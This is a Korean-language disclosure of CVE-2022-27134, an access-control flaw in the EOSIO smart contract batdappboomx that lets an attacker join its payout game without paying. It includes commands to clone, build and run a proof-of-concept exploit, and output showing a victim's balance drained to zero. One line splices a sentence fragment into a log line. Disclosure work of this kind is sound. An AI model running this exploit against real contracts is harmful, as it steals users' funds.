
CVE-2022-27134
CVE-2022-27134
batdappboomx는 EOSIO 블록체인에서 실행되는 공개 스마트 컨트랙트입니다. 이 스마트 컨트랙트는 참가자가 일부 암호화폐를 사전에 지불하면 보상으로 암호화폐를 지급합니다.
이 스마트 컨트랙트의 최신 버전입니다. 스마트 컨트랙트의 sha256 해시 코드는 1327c04cf4b56183eddb1a897bbebf5a873d3421272b708829a4ed0765bef820입니다.
블록체인 탐색기(https://bloks.io/account/batdappboomx)에서 확인할 수 있습니다.
접근 제어 취약점
batdappboomx는 오픈소스가 아니지만, WASAI를 통해 취약점을 발견했습니다. 공격자는 아무것도 지불하지 않고 이 게임에 참여할 수 있습니다.
git clone https://github.com/Kenun99/CVE-batdappboomx.git && cd CVE-batdappboomx
docker build -t localhost/client-eos:eos .
docker run --rm --network host -it localhost/client-eos:eos
EOS)를 탈취합니다.info 2022-03-11T14:28:53.345 keosd wallet_plugin.cpp:38 plugin_initialize ]
...
warn 2022-03-11T14:28:53.355 keosd wallet.cpp:218 save_wallet_file ] saving wallet to file /root/eosio-wallet/./default.wallet
Creating wallet: default
Save password to use in the future to unlock this wallet.
Without password imported keys will not be retrievable.
saving password to /root/passwd
imported private key for: EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV
[+] victim's balance: 100.00 -> 0.00
[+] attacker's balance: 10000000.00 10000100.00
[+] Attacked successfully. Got more cryptocurrency.